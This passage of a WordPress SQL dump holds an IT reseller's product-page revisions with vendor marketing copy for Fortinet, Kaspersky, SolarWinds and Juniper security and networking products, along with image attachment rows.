<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2018-12-17 12:34:00','2018-12-17 04:34:00','',1474,'https://bintara.com.my/blog/2018/12/17/1474-revision-v1/',0,'revision','',0),(2283,1,'2018-12-17 12:34:11','2018-12-17 04:34:11','','KESB-Select2','','inherit','closed','closed','','kesb-select2','','','2018-12-17 12:34:11','2018-12-17 04:34:11','',1543,'https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select2.png',0,'attachment','image/png',0),(2284,1,'2018-12-17 12:34:48','2018-12-17 04:34:48','','KESB-Select3','','inherit','closed','closed','','kesb-select3','','','2018-12-17 12:34:48','2018-12-17 04:34:48','',1543,'https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select3.png',0,'attachment','image/png',0),(2285,1,'2018-12-17 12:37:40','2018-12-17 04:37:40','<h3>Endpoint Security for Business</h3>\r\n<h3>SELECT</h3>\r\nWith more of your business operations going digital, you need to protect every server, laptop &amp; mobile device. In a single solution â€“ with one easy-to-use management console â€“ we deliver Next-Gen Security that helps you protect every endpoint your business runs.\r\n<ul>\r\n 	<li>Protects against the latest threats, including ransomware</li>\r\n 	<li>Hardens endpoints â€“ to reduce your exposure to cyberattacks</li>\r\n 	<li>Helps boost productivity â€“ via cloud-enabled usage controls</li>\r\n 	<li>Protects servers &amp; endpoints without damaging performance</li>\r\n 	<li>Secures diverse environments â€“ PC, Mac, Linux, iOS &amp; Android</li>\r\n 	<li>Simplifies security management â€“ with one unified console</li>\r\n</ul>\r\n<h4><img class=\"alignnone size-full wp-image-2281\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select.png\" alt=\"\" width=\"293\" height=\"220\" /></h4>\r\n<h4 class=\"section-title\">Performance &amp; multilayer protection</h4>\r\n<div>\r\n\r\nSecurity shouldnâ€™t slow you down. Thatâ€™s why our security has minimal impact on system performance â€“ and, if youâ€™re attacked, Automatic Rollback undoes most malicious actionsâ€¦ so users can keep on working.\r\n<h4><img class=\"alignnone size-full wp-image-2283\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select2.png\" alt=\"\" width=\"293\" height=\"220\" /></h4>\r\n<h4 class=\"section-title\">Next-Gen protection technologies</h4>\r\n<div>\r\n\r\nDelivers world-class security â€“ including static &amp; dynamic Machine Learning technologies â€“ to help reduce your businessâ€™s attack surface and keep all your endpoints safeâ€¦ while reducing the need to download frequent updates.\r\n\r\n</div>\r\n<h4><img class=\"alignnone size-full wp-image-2284\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select3.png\" alt=\"\" width=\"293\" height=\"220\" /></h4>\r\n<h4 class=\"section-title\">Simplifies security management tasks</h4>\r\n<div>\r\n\r\nHelps you deploy security rapidly and with the minimum of fuss â€“ using any of our wide range of preconfigured scenarios. A single unified management console makes it easy to apply your chosen security policies to every endpoint in your business.\r\n<h3></h3>\r\n<h3>The smart choice for security</h3>\r\n<h4>Future-proof your endpoint security</h4>\r\nWeâ€™ve identified more advanced threats than any other security vendor â€“ and weâ€™re recognized for innovation. So, you get security that adapts to protect you from new threatsâ€¦ whether your IT is on-site or outsourced.\r\n<h4>Keep tight control of your costs</h4>\r\nWith multiple security technologies â€“ including Next-Gen â€“ in a single product, there are no hidden costs. One product â€“ with one license â€“ is all you need to buy to protect your endpoints.\r\n<h4>Benefit from integration</h4>\r\nAll our core technologies are developed in-house â€“ and every function is within one agent â€“ so you benefit from efficient, integrated protection.\r\n<h4>Security that wins more awardsâ€¦ does more to protect</h4>\r\nDonâ€™t just take our word for it. In recent years, our products have participated in more independent tests &amp; reviews â€“ and have achieved more first places than any other vendor.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','Kaspersky','','inherit','closed','closed','','1543-revision-v1','','','2018-12-17 12:37:40','2018-12-17 04:37:40','',1543,'https://bintara.com.my/blog/2018/12/17/1543-revision-v1/',0,'revision','',0),(2286,1,'2018-12-18 22:58:45','2018-12-18 14:58:45','<h1>SolarWinds: We Make IT Look Easy</h1>\r\nWe are a leading provider of powerful and affordable IT infrastructure management software. Our products give organizations worldwide, regardless of type, size or IT infrastructure complexity, the power to monitor and manage the performance of their IT environments, whether on-premises, in the cloud, or in hybrid models.\r\n<h2>PRODUCTS</h2>\r\n<h3>NETWORK MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Network Performance MonitorÂ </strong></li>\r\n</ol>\r\n<strong>Â <img class=\"alignnone wp-image-2459\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Network-Performance-Monitor-.png\" alt=\"\" width=\"388\" height=\"242\" /></strong>\r\n\r\nNetwork monitoring software designed to reduce network outages and improve performance.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor network monitoring</li>\r\n 	<li>Network Insights for deeper visibility</li>\r\n 	<li>Intelligent maps</li>\r\n 	<li>NetPath and PerfStack for easy troubleshooting</li>\r\n 	<li>Smarter scalability for large environments</li>\r\n 	<li>Advanced alerting</li>\r\n</ul>\r\n2.Â <strong>Network Configuration Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2460\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Network-Configuration-Manager.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nAutomate network configuration management and compliance, which can help save time and optimize IT resources.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Network automation</li>\r\n 	<li>Network compliance</li>\r\n 	<li>Configuration backup</li>\r\n 	<li>Vulnerability assessment</li>\r\n 	<li>Network Insights for Cisco ASA and Cisco Nexus</li>\r\n 	<li>Integration with Network Performance Monitor</li>\r\n</ul>\r\n3.Â <strong>ipMonitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2461\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipMonitor.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nEssential up/down and performance monitoring for networks, servers, and applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor network devices, servers, and applications from one console</li>\r\n 	<li>Receive alerts for availability and performance issues</li>\r\n 	<li>Monitor network status on maps and NOC view</li>\r\n 	<li>Minimize downtime by automating remediation actions</li>\r\n 	<li>Enhance monitoring with built-in reports and dashboards</li>\r\n</ul>\r\n4.Â <strong>IP Address Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2462\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/IP-Address-Manager.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nIP address management software designed to save time and prevent costly errors.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automated IP address tracking</li>\r\n 	<li>Integrated DHCP, DNS, and IP address management</li>\r\n 	<li>IP address alerting, troubleshooting, and reporting</li>\r\n 	<li>Multi-vendor on-prem and cloud DHCP and DNS support</li>\r\n 	<li>IP Request Wizard for streamlining and automating IP address requests</li>\r\n 	<li>API support with CRUD operations for two-way integration with third-party software</li>\r\n</ul>\r\n5.Â <strong>User Device Tracker</strong>\r\n\r\n<img class=\"alignnone wp-image-2463\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/User-Device-Tracker.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nNetwork device tracking software that can locate users and devices on your network.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Quickly locate network devices</li>\r\n 	<li>Map and monitor WAPs, switches, and ports</li>\r\n 	<li>Manage switch and switch port capacity</li>\r\n 	<li>Detect rogue devices and users</li>\r\n 	<li>Turn ports on and off remotely</li>\r\n 	<li>Unified IT administration dashboard</li>\r\n</ul>\r\n6.Â <strong>NetFlow Traffic Analyzer</strong>\r\n\r\n<img class=\"alignnone wp-image-2464\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/NetFlow-Traffic-Analyzer.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nNetFlow analyzer and bandwidth monitoring software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Bandwidth monitoring</li>\r\n 	<li>Application traffic alerting</li>\r\n 	<li>Network traffic analysis</li>\r\n 	<li>Performance Analysis Dashboard</li>\r\n 	<li>CBQoS policy optimization</li>\r\n 	<li>Malicious or malformed traffic flow identification</li>\r\n</ul>\r\n7.Â <strong>VoIP and Network Quality Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2465\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VoIP-and-Network-Quality-Manager.png\" alt=\"\" width=\"378\" height=\"236\" />\r\n\r\nVoIP monitoring software designed for deep critical call QoS metrics and WAN performance insights.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Real-time WAN monitoring</li>\r\n 	<li>Troubleshoot VoIP call quality problems</li>\r\n 	<li>Visual VoIP call path trace</li>\r\n 	<li>Cisco VoIP gateway and PRI trunk monitoring</li>\r\n 	<li>Cisco SIP trunk monitoring</li>\r\n 	<li>Simplify IP SLA setup</li>\r\n</ul>\r\n<h3>SYSTEM MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\n<img class=\"alignnone wp-image-2466\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Server-Application-Monitor.png\" alt=\"\" width=\"389\" height=\"243\" />\r\n\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Virtualization Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2467\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Virtualization-Manager.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nVirtual machine monitor designed to optimize performance and fix issues in minutes.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Predictive Recommendations</li>\r\n 	<li>VM Sprawl Control</li>\r\n 	<li>Comprehensive virtualization management</li>\r\n 	<li>Powerful capacity planning tools</li>\r\n 	<li>Manage across on-premise, hybrid, and cloud</li>\r\n 	<li>Visibility across the application stack</li>\r\n</ul>\r\n3.Â <strong>Storage Resource Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2468\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Storage-Resource-Monitor.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n4. <strong>Server Configuration Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2469\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Server-Configuration-Monitor.png\" alt=\"\" width=\"382\" height=\"239\" />\r\n\r\nServer configuration and change monitoring tool that\'s built to be easy to use.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Track system and application changes</li>\r\n 	<li>Compare configuration changes over time</li>\r\n 	<li>Correlate configuration changes to performance</li>\r\n 	<li>Asset inventory</li>\r\n 	<li>Orion Platform integration</li>\r\n</ul>\r\n5.Â <strong>Application Performance Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2470\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Application-Performance-Monitor.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nExtending Server &amp; Application Monitor with in-depth performance monitoring of your custom applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor your custom .NET applications running on Microsoft IIS</li>\r\n 	<li>Integrated with Server &amp; Application Monitor</li>\r\n 	<li>Response Time Heat Map</li>\r\n 	<li>Transaction Performance Monitoring</li>\r\n 	<li>Distributed Transaction Tracing</li>\r\n 	<li>Trace Details</li>\r\n</ul>\r\n6.Â <strong>Web Performance Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2471\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Web-Performance-Monitor.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nWebsite monitoring software built for comprehensive web and SaaS application performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Complete performance monitoring</li>\r\n 	<li>Continuous synthetic transaction monitoring</li>\r\n 	<li>Detailed load-time metrics</li>\r\n 	<li>Monitor from multiple locations</li>\r\n 	<li>Browser-based transaction recorder</li>\r\n 	<li>Transaction recording</li>\r\n</ul>\r\n7.Â <strong>SolarWinds Backup</strong>\r\n\r\n<img class=\"alignnone wp-image-2472\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SolarWinds-Backup.png\" alt=\"\" width=\"378\" height=\"236\" />\r\n\r\nServer backup software designed to be modern and reliable, without the cost and complexity.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Unified, cloud-based backup service for physical and virtual servers</li>\r\n 	<li>Robust and reliable enough to handle even large machines and applications</li>\r\n 	<li>Fast backup and rapid restore with built-in compression and deduplication</li>\r\n 	<li>Simple, at-a-glance status dashboard eliminates manual checking</li>\r\n 	<li>Global, purpose-built, private cloud included</li>\r\n 	<li>Low TCO with no hidden costs</li>\r\n</ul>\r\n<h3>DATABASE MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\n<img class=\"alignnone wp-image-2473\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Server-Application-Monitor-1.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Storage Resource Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2474\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Storage-Resource-Monitor-1.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n<h3>IT SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Access Rights Manager</strong></li>\r\n</ol>\r\n<img class=\"alignnone wp-image-2475\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Access-Rights-Manager.png\" alt=\"\" width=\"378\" height=\"236\" />\r\n\r\nManage and audit access rights across your IT infrastructure.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitoring of Active Directory</li>\r\n 	<li>Auditing for Windows File Share</li>\r\n 	<li>Monitoring of Microsoft Exchange</li>\r\n 	<li>SharePoint access monitoring and management</li>\r\n 	<li>User provisioning and management</li>\r\n 	<li>User permissions analysis</li>\r\n</ul>\r\n2.Â <strong>Threat Monitor - IT Ops Edition</strong>\r\n\r\n<img class=\"alignnone wp-image-2476\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Threat-Monitor-IT-Ops-Edition.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nMonitor, respond, and report security threats in near real time.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Continuously updated threat intelligence</li>\r\n 	<li>Security Information and Event Manager (SIEM)</li>\r\n 	<li>Log correlation</li>\r\n 	<li>Log event archive</li>\r\n 	<li>Network and Host Intrusion Detection System</li>\r\n 	<li>Highly indexed log search capabilities</li>\r\n</ul>\r\n3.Â <strong>Log &amp; Event Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2477\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Log-Event-Manager.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nSIEM tools make it easier to use event logs for security, compliance, and troubleshooting.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Integrated compliance reporting tools</li>\r\n 	<li>Event-time correlation of security events</li>\r\n 	<li>Automated threat remediation</li>\r\n 	<li>Advanced search and forensic analysis</li>\r\n 	<li>File integrity monitoring</li>\r\n 	<li>USB device monitoring</li>\r\n</ul>\r\n4.Â <strong>Serv-U File Transfer Protocol Server</strong>\r\n\r\n<img class=\"alignnone wp-image-2478\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Serv-U-File-Transfer-Protocol-Server.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nSimple, affordable, easy-to-use FTP server software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>File transfer using FTP and FTPS</li>\r\n 	<li>Quick and easy file transfers from the web and mobile devices</li>\r\n 	<li>Transfer multiple and large files easily</li>\r\n 	<li>Simple file transfer administration and management</li>\r\n 	<li>Secure gateway helps avoid data at rest in DMZ networks</li>\r\n 	<li>Easily manage file transfer settings and permissions</li>\r\n</ul>\r\n5.Â <strong>Patch Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2479\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Patch-Manager.png\" alt=\"\" width=\"378\" height=\"286\" />\r\n\r\nPatch management software designed for quickly addressing software vulnerabilities.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Microsoft WSUS patch management</li>\r\n 	<li>Integrations with SCCM</li>\r\n 	<li>Vulnerability management</li>\r\n 	<li>Pre-built/pre-tested packages</li>\r\n 	<li>Patch compliance reports</li>\r\n 	<li>Patch status dashboard</li>\r\n</ul>\r\n6.Â <strong>Serv-U Managed File Transfer Server</strong>\r\n\r\n<img class=\"alignnone wp-image-2480\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Serv-U-Managed-File-Transfer-Server.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nEnhance security and control over file transfers in and outside your organization.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Reliable FTP server software for secure file transfer</li>\r\n 	<li>Ad hoc file sharing to easily send and request files</li>\r\n 	<li>Anywhere, anytime file transfer from web and mobile devices</li>\r\n 	<li>Upload and download large files quickly and easily</li>\r\n 	<li>Centralized file transfer management and automation</li>\r\n 	<li>Maintain regulatory compliance</li>\r\n</ul>\r\n<h3>IT HELP DESK</h3>\r\n<ol>\r\n 	<li><strong>Web Help Desk</strong></li>\r\n</ol>\r\n<img class=\"alignnone wp-image-2481\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Web-Help-Desk.png\" alt=\"\" width=\"382\" height=\"239\" />\r\n\r\nAffordable Help Desk Ticketing and Asset Management Software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automate ticketing management</li>\r\n 	<li>Centralize your knowledge management</li>\r\n 	<li>Meet your SLAs</li>\r\n 	<li>Relational ticket association to simplify project and task management</li>\r\n 	<li>Native integration with Active Directory and LDAP</li>\r\n 	<li>Measure customer satisfaction</li>\r\n</ul>\r\n2.Â <strong>Dameware Remote Support</strong>\r\n\r\n<img class=\"alignnone wp-image-2482\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Dameware-Remote-Support.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nRemote control and systems management tools in one easy-to-use package.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Fast and secure remote control</li>\r\n 	<li>Anywhere, anytime remote assistance</li>\r\n 	<li>Simplify Windows administration</li>\r\n 	<li>Built-in remote admin tools</li>\r\n 	<li>Deliver remote support from iOS and Android devices</li>\r\n 	<li>Remotely manage Active Directory environments</li>\r\n</ul>\r\n3.Â <strong>Dameware Mini Remote Control</strong>\r\n\r\n<img class=\"alignnone wp-image-2483\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Dameware-Mini-Remote-Control.png\" alt=\"\" width=\"383\" height=\"239\" />\r\n\r\nAffordable remote control software for all your customer support and help desk needs.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-platform desktop sharing and remote control</li>\r\n 	<li>Remote access to sleeping and powered-off computers</li>\r\n 	<li>Multi-factor authentication</li>\r\n 	<li>Flexible user access control</li>\r\n 	<li>Customize and automatically deploy remote control agents</li>\r\n 	<li>Remote session tools and utilities</li>\r\n</ul>\r\n4.Â <strong>Mobile Admin</strong>\r\n\r\n<img class=\"alignnone wp-image-2484\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mobile-Admin.jpg\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nGet help simplifying IT administration and management from your mobile device.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>SolarWinds OrionÂ® Platform integration</li>\r\n 	<li>Active Directory</li>\r\n 	<li>Virtualization management</li>\r\n 	<li>Email server management</li>\r\n 	<li>Backup management</li>\r\n 	<li>Remote access</li>\r\n</ul>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Solarwinds','','inherit','closed','closed','','1597-autosave-v1','','','2018-12-18 22:58:45','2018-12-18 14:58:45','',1597,'https://bintara.com.my/blog/2018/12/17/1597-autosave-v1/',0,'revision','',0),(2287,1,'2018-12-17 14:29:36','2018-12-17 06:29:36','<div class=\"main-headline ng-star-inserted\">\r\n<h3 class=\"ng-star-inserted\">Solutions</h3>\r\n</div>\r\n<div class=\"main-body ng-star-inserted\">\r\n<p class=\"main-body-item ng-star-inserted\">Advanced technologies engineered to help you solve the toughest challenges in networking.</p>\r\n\r\n</div>\r\n<h3>Switching</h3>\r\n<h4>EX Series Ethernet Switches</h4>\r\nThese cloud-grade switches are designed for the converged enterprise branch, campus, and data center, and for service providers. They address growing enterprise demands for high availability, unified communications, and virtualization.\r\n<h4>QFX Series</h4>\r\nQFX Series switches satisfy the needs of todayâ€™s most demanding enterprise and service provider data center environments. This high-performance, high-density platform is designed for top-of-rack, end-of-row, and spine-and-core aggregation deployments.\r\n<h4>Data Center Switching Architectures</h4>\r\nJuniper switches provide the high-performance, high-density platforms required to build innovative data center fabrics that scale to thousands of ports.\r\n\r\n&nbsp;\r\n<h3>Wireless</h3>\r\n<h4>Aerohive Wireless LANs</h4>\r\nCloud-managed Wi-Fi access points, available from Juniper, that boost coverage and capacity. A distributed control mechanism eliminates the need for separate wireless controllers, streamlining your wireless infrastructure.\r\n<h4>Mist Learning Wireless LAN</h4>\r\nA machine learning-based wireless LAN solution that improves your Wi-Fi management and provides real-time information on end users and their mobile devices.\r\n\r\n&nbsp;\r\n<h3>Routers</h3>\r\n<h4>MX Series 5G Universal Routing Platform</h4>\r\nA robust portfolio of SDN-enabled routing platforms that provide industry-leading system capacity, density, and performance with unparalleled longevity. MX Series routers are key to digital transformation for service providers, cloud operators, and enterprises.\r\n<h4>PTX Series Packet Transport Routers</h4>\r\nPTX Series routers form the foundation of the Converged SupercoreÂ® architecture, providing performance, optical transport integration, and elegant deployment. They support high-density 100GbE environments, with energy efficiency of less than half a watt per Gbps.\r\n<h4>ACX Series Universal Metro Routers</h4>\r\nMEF CE 2.0-compliant hardened routers address use cases of business Ethernet services, residential aggregation, small cell, mobile backhaul, and industrial field area networks.\r\n<h4>CTP Series Circuit to Packet Platforms</h4>\r\nThese platforms give time-division multiplexing (TDM) and serial and analog circuit-based applications reliable and efficient access to next-generation IP networks with all of their cost, redundancy, and efficiency advantages.\r\n<h4>T4000 Core Router</h4>\r\nThe T4000 Core Router is a true multiservice core system that delivers reliable and flexible core backbone architecture to carry a wide breadth of services over a common IP/MPLS infrastructure.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Juniper','','inherit','closed','closed','','1533-autosave-v1','','','2018-12-17 14:29:36','2018-12-17 06:29:36','',1533,'https://bintara.com.my/blog/2018/12/17/1533-autosave-v1/',0,'revision','',0),(2288,1,'2018-12-17 14:29:28','2018-12-17 06:29:28','<div class=\"main-headline ng-star-inserted\">\r\n<h3 class=\"ng-star-inserted\">Solutions</h3>\r\n</div>\r\n<div class=\"main-body ng-star-inserted\">\r\n<p class=\"main-body-item ng-star-inserted\">Advanced technologies engineered to help you solve the toughest challenges in networking.</p>\r\n\r\n</div>\r\n<h3>Switching</h3>\r\n<h4>EX Series 